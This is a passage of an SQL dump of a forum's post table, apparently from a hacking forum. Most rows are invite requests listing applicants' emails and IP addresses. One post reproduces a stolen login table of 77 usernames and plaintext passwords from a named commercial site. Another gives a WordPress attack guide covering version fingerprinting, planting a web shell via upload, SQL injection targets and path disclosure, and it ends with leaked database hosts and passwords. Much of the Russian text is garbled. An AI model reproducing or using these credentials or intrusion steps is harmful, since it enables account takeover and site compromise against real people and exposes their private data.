AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1597, 1083, 1508, 'BigBear', 34, '', 1408110867, '[quote=kx00;1508][url]http://www.caribbeancom.com/[/url]\r\n\r\n[html]database: Movie\r\n[10 tables]\r\n+----------+\r\n| category |\r\n| coupon |\r\n| group |\r\n| login |\r\n| movie |\r\n| orders |\r\n| parts |\r\n| ranking |\r\n| rating |\r\n| series |\r\n+----------+[/html]\r\n[html]table: Login\r\n[77 entries]\r\n+----------------------+---------+--------------+-----------------+\r\n| user_id | site_id | password | user_name |\r\n+----------------------+---------+--------------+-----------------+\r\n| tmasami | 1700 | lkjsdf3af3a | tmasami |\r\n| studio9014 | 9014 | lp8jkb6a | h&h |\r\n| webmaster1100 | 1100 | diwoa4wa | webmaster1100 |\r\n| masako | 1700 | mbarrow | masako barrow |\r\n| hitomi | 1700 | i86yulma+ | hitomi |\r\n| momoko | 1700 | mnm58bbs] | momoko |\r\n| wuehara | 1700 | zwm52fm2bsof | wuehara |\r\n| webmaster1900 | 1900 | gei8oavc | webmaster1900 |\r\n| mizuho | 1700 | lbsb>9rq8 | mizuho |\r\n| kengo | 1700 | test1234 | kengo tateda |\r\n| syamamoto | 1700 | lpm8nyr5 | syamamoto |\r\n| hiro | 1700 | hzusho | hiro zusho |\r\n| mariko | 1700 | megami | mariko egami |\r\n| nancy | 1700 | nim | nancy im |\r\n| daniel | 1700 | dlemos | daniel lemos |\r\n| kazunori | 1700 | lkgm1dsu | kazunori koga |\r\n| sales1700 | 1700 | f1ha8k7a | sales1700 |\r\n| guest1700 | 1700 | asidf5de | guest1700 |\r\n| manager1700 | 1700 | re35desp | manager1700 |\r\n| webmaster1700 | 1700 | ot8b3cua | webmaster1700 |\r\n| webmaster1200 | 1200 | mrkiap41 | webmaster1200 |\r\n| webmaster1300 | 1300 | iu8aplev | webmaster1300 |\r\n| webmaster1400 | 1400 | forpw3gh | webmaster1400 |\r\n| webmaster2300 | 2300 | 52e8irp6 | webmaster2300 |\r\n| webmaster1600 | 1600 | dpe16vew | webmaster1600 |\r\n| webmaster1800 | 1800 | wosp2bfr | webmaster1800 |\r\n| webmaster2001 | 2001 | s2xy6me | webmaster2001 |\r\n| studio1500 | 1500 | r5rx8zmu | avbox |\r\n| webmaster2200 | 2200 | twc2rexy | webmaster2200 |\r\n| studio1600 | 1600 | bwhsvhv7 | dreamroom |\r\n| studio2000 | 2000 | gsfoqq1w | スカイãƒÂイ |\r\n| studio2100 | 2100 | kygxz5qc | s2 エンターテイメント |\r\n| studio9001 | 9001 | snge1lrn | mugen エンターテイメント |\r\n| studio9002 | 9002 | 5q9i7leh | kokeshi |\r\n| miwa | 1700 | 3939 | miwa |\r\n| d2p | 1700 | mhxv3kkn | d2p |\r\n| akipikka | 1700 | lovemiyomiyo | akiko yamamoto |\r\n| dti | 1700 | f1ha8k7a | staff |\r\n| studio9003 | 9003 | x0tols81 | v & r |\r\n| studio9004 | 9004 | qu857aqo | teriyaki |\r\n| guest1100 | 1100 | ngm885wj | guest1100 |\r\n| guest1300 | 1300 | 1wezy1r7 | guest1300 |\r\n| guest1400 | 1400 | t43yhbc8 | guest1400 |\r\n| guest1800 | 1800 | 964vekpm | guest1800 |\r\n| guest2200 | 2200 | a9w7ku22 | guest2200 |\r\n| guest1900 | 1900 | qwsf96s7 | guest1900 |\r\n| studio9005 | 9005 | a3tafe29 | progre |\r\n| enokida | 1700 | e32cy74 | s enokida |\r\n| studio9010 | 9010 | akh9jn71 | スタジオ舞妓 |\r\n| studio9011 | 9011 | ak8s7jwe | teriyaki2 |\r\n| blog1700 | 1700 | anbksu8ah | blog1700 |\r\n| studio_prog_1600 | 1600 | ua8aj2jab4k | prog |\r\n| studio9102 | 9102 | kal9uryqbs | b-dash |\r\n| studio_skyhighx_2000 | 2000 | lakfs8dfh2l3 | スカイãƒÂイx |\r\n| studio9013 | 9013 | avwp3cse | hotcream |\r\n| studio9012 | 9012 | alkjsdf823b | stage2media |\r\n| studio_prog2_1600 | 1600 | lkjs983a4bd | prog2 |\r\n| cjun | 1700 | b1feaxucu16y | cjun |\r\n| studio_prog3_1600 | 1600 | 8hjk2fgwpu | prog3 |\r\n| dlsystems | 1100 | kjsd92kasdf | dl systems |\r\n| webmaster2400 | 2400 | jksd8nhj2 | webmaster2400 |\r\n| ahiguchi | 1700 | ake88aisbin2 | ahiguchi |\r\n| ysakakibara | 1700 | xk982jbadf | ysakakibara |\r\n| studio_master | 1100 | le8h3pesm | studio_master |\r\n| webmaster1100en | 1100 | okei3ush4 | webmaster1100en |\r\n| studio9015 | 9015 | 9kjeuhg5 | ティティ (グレイズ) |\r\n| studio9016 | 9016 | 7e3lgrdg8 | ティティ(tma) |\r\n| studio9017 | 9017 | nmajr8kl | merci beaucoup |\r\n| weslee1100 | 1100 | laki8hjmc | weslee1100 |\r\n| marchin1100 | 1100 | o19jf48c | marchin1100 |\r\n| studio9018 | 9018 | l7dtk3qp | climax zipang |\r\n| studio9019 | 9019 | yel7t4ks | ティティ(abc) |\r\n| studio9020 | 9020 | datpq3r9 | pink champagne |\r\n| sshimizu | 1700 | hdky5jqzvp | sshimizu |\r\n| studio9021 | 9021 | da4el3pq | studio mfk |\r\n| studio9022 | 9022 | hltee9a1p | murakami(ムラカミ) |\r\n| mmusashi | 1700 | kl89s2afv3 | mmusashi |\r\n+----------------------+---------+--------------+-----------------+[/html]\r\n\r\nтðú, ÑÂтø ÷òõрø ðôüøýþòÑÂúøõ. ðôüøýúу ýõ ýðшõû. õÑÂть /webmasters/ ýþ ÿþчõüу тþ ÿõрõýðÿрðòÃȄÂõт ýð index, òþ÷üþöýþ ôõûþ ò ip.\r\n \r\nю÷õры ðòтþрø÷уютÑÂѠчõрõ÷ d2pass. òðрøðýт, ýуöõý шõûû ýð b.caribbeancom.com тðü ðòтþрø÷ðцøѠчõрõ÷ api øôõт.[/quote]\r\n\r\nÿрøòõт. ôð, ÑÂтø тðñûøцы òøôõû. ÿþхþôу ю÷òõрø ûõöðт øüõýýþ ò d2pass.\r\n\r\nð ûþüðть тðúую ÑÂøÑÂтõüу - уöõ þтôõûьýыù рð÷óþòþр.', 1, 0, '', 0, 1, 0, 0, 0),
(1598, 1443, 0, 'BigBear', 34, 'ÿþ ушø... ò wp', 1408111427, 'ßõрòðѠчðÑÂть ÑÂтðтьø ѠÿþôрþñýþÑÂÑ‚ÑÂüø\n\n[SIZE=3][COLOR=Red][B]WordPress 1.0 < 1.5[/B][/COLOR][/SIZE]\n\n[COLOR=Blue][B]Úðú øôõýтøфøцøрþòðть (2 ÑÂÿþÑÂþñð):[/B][/COLOR]\n\n[B]áÿþÑÂþñ â„–1[/B] - çøтðõü ./readme.html\n[code]Version 1.0.2[/code]\n[B]áÿþÑÂþñ â„–2[/B] - þÑÂþñõýýþÑÂтø ðòтþрø÷ðцøø ðôüøýð.\n\nÒõрÑÂøю 1.Ñ… (ôþ 1.5 ýõ òúûючøтõûьýþ) üþöýþ øôõýтøфøцøрþòðть Ѡñþûьшþù ôþûõù òõрþÑÂтýþÑÂтø ÿþ ýðûøчøю ÑÂтрþúø [code] \";\n $blogrolling = false;\n $opml_url = $uploadfile;\n } else {\n echo \"Upload error
\";\n }\n }[/code]\nÚðú ýõ ÑÂûþöýþ ÷ðüõтøть - ýøúðúøх ÿрþòõрþú ýð úþýтõýт/рðÑÂшøрõýøõ фðùûð ýõ ÿрþøÑÂхþôøт.\n\nèõûû ñуôõт ò ôøрõúтþрøø, уúð÷ðýýþù ò ýðÑÂтрþùúðх [code] ./wp-admin/options.php?option_group_id=4 [/code]\nßþ уüþûчðýøю ÑÂтþ ÿðÿúð [B]/images[/B]\n\nî÷ðõü шõûû [code] ./images/shell.php[/code]\n[COLOR=Blue][B]ßрø SQL øýъõúцøø:[/B][/COLOR]\n[code][B]Table[/B] = wp_users\n[B]Columns[/B] = user_login, user_pass, user_level=10\n\n[B]ÃÂûóþрøтü Ñ…ÑÂшøрþòðýøÑÂ[/B] = plain-text\n[/code]\n[COLOR=Blue][B]à ðÑÂúрытøõ ÿутõù ôûѠýõðòтþрø÷þòðýýых ÿþûь÷þòðтõûõù:[/B][/COLOR]\n[code]./wp-admin/admin-footer.php\n./wp-admin/edit-form-advanced.php\n./wp-admin/edit-form-comment.php\n./wp-admin/edit-form.php\n./wp-includes/functions.php\n./wp-includes/kses.php\n./wp-includes/vars.php\n./wp-settings.php\n./xmlrpc.php\n[/code]\n[code]Fatal error: Call to undefined function timer_stop() in X:\\home\\wp1\\wp-admin\\admin-footer.php on line 5[/code]\nÃ’ ÑÂтþù òõрÑÂøø WordPress, ò õôøýÑÂтòõýýþù ø÷þ òÑÂõх õÑÂть ôþÑÂтуÿýыù ôûѠòÑÂõх [B]PHPINFO()[/B].\n\n[code]./phpinfo.php[/code]\n[SIZE=3][COLOR=Red][B]WordPress 1.5 < 2.0[/B][/COLOR][/SIZE]\n\n[COLOR=Blue][B]Úðú øôõýтøфøцøрþòðть (2 ÑÂÿþÑÂþñð):[/B][/COLOR]\n\n[B]áÿþÑÂþñ â„–1[/B] - çøтðõü ./readme.html\n[code]Version 1.5.1[/code]\n[B]áÿþÑÂþñ â„–2[/B] - þÑÂþñõýýþÑÂтø ðòтþрø÷ðцøø ðôüøýð.\n\nÒõрÑÂøø 1.5 < 2.0 хðрðúтõрø÷уõт þтÑÂутÑÂтòøõ чõúñþúÑÂð ýð ÑÂтрðýøцõ ðòтþрø÷ðцøø ./wp-login.php.\n\nàтðúöõ þтÑÂутÑÂтòøõ úþýтрþûьýþù ÑÂтрþúø [code] =2.0 хðрðúтõрø÷уютÑÂѠтþûьúþ þтÑÂутÑÂòøõü ÿрø÷ýðúþò, хðрðúтõрýых ôûѠñþûõõ рðýýøх òõрÑÂøù.\n\nàøüõýýþ:\n\n1) ÞтÑÂутÑÂтòøõü úþýтрþûьýþù ÑÂтрþúø ò фðùûõ ./wp-login.php [code] unix_timestamp(date(now()))\'> temp/jos_usermoney.sql\n[/code]\nø õщõ \n[code]\n\n$host = \"db.0ver.pro\";\n$user = \"grechan\";\n$pass = \"j5Jj5gvBrO\";\n$base = \"wwwoverproru\";\n$con = mysql_connect($host, $user, $pass); mysql_select_db($base, $con);\n\nif (!$con) { echo \"Ñð÷ð ôðýýых ýõ ÿþôúûючõýð.\"; exit; }\n@mysql_query(\"SET NAMES \'utf8\'\");\n?>\n\n\n\n$host=\"overpro.ru\";\n$port=3306;\n$socket=\"\";\n$user=\"YoriK\";\n$password=\"hfplfk,fq\";\n$dbname=\"wwwoverproru\";\n[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(1612, 1447, 0, 'Invite', 2, '{$name}', 1408138840, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1613, 1448, 0, 'Invite', 2, '{$name}', 1408139008, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@kakak.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1614, 1449, 0, 'w0rm', 1, 'market FAQ', 1408140922, 'coming soon', 1, 0, '', 0, 1, 0, 0, 0),
(1616, 1451, 0, 'Invite', 2, '{$name}', 1408191188, '[SIZE=\'4\'][COLOR=\'Sienna\']snowden[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: e.snowden@jmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://snowden.info | snowden.info \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1617, 1452, 0, 'Invite', 2, '{$name}', 1408191875, '[SIZE=\'4\'][COLOR=\'Sienna\']Bl4k3_[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: null;null;\n[b]e-mail[/b]: bl4ke1@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.43.5.192\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.meetme.com/member/4875609 | http://www.meetme.com/member/4875609 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1619, 1453, 0, 'Invite', 2, '{$name}', 1408192615, '[SIZE=\'4\'][COLOR=\'Sienna\']Krolle[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: \n[b]e-mail[/b]: preaker@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 87.55.7.8\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1620, 1454, 0, 'Invite', 2, '{$name}', 1408194646, '[SIZE=\'4\'][COLOR=\'Sienna\']Dr.XzErO[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ: 923286\n[b]e-mail[/b]: xzero_team@gmx.at\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 86.56.226.62\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://do4a.com/members/dr-zero.43772/ | https://do4a.com/members/dr-zero.43772/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1764, 1067, 1086, '123', 41, '', 1408803863, 'Úðúþù-тþ утырþчýыù рõÑÂ, тðü ñыû þÿõýøúѠ/pads/www/delivery/afr.php\nýþ òыôðõт 404', 1, 0, '', 0, 1, 0, 0, 0),
(1622, 1455, 0, 'Invite', 2, '{$name}', 1408199371, '[SIZE=\'4\'][COLOR=\'Sienna\']iefuzzer[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sh@priv.in\n[b]e-mail[/b]: iefuzzer@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 123.113.188.172\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://shazzer.co.uk/user/iefuzzer | http://shazzer.co.uk/user/iefuzzer \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1623, 1456, 0, 'Invite', 2, '{$name}', 1408202613, '[SIZE=\'4\'][COLOR=\'Sienna\']M3sRine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: mesrine@exploit.im\n[b]e-mail[/b]: akrapovicdz@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.98.60.126\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://m3srine.nooszone.yuku.com | m3srine.nooszone.yuku.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1624, 1457, 0, 'Invite', 2, '{$name}', 1408206675, '[SIZE=\'4\'][COLOR=\'Sienna\']nhocvip[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: jacker2007@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 42.116.223.28\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://nhocvip.wix.com | nhocvip.wix.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1625, 1458, 0, 'Invite', 2, '{$name}', 1408212369, '[SIZE=\'4\'][COLOR=\'Sienna\']Mr_AnarShi-T[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: w-98@live.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.28.103.152\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
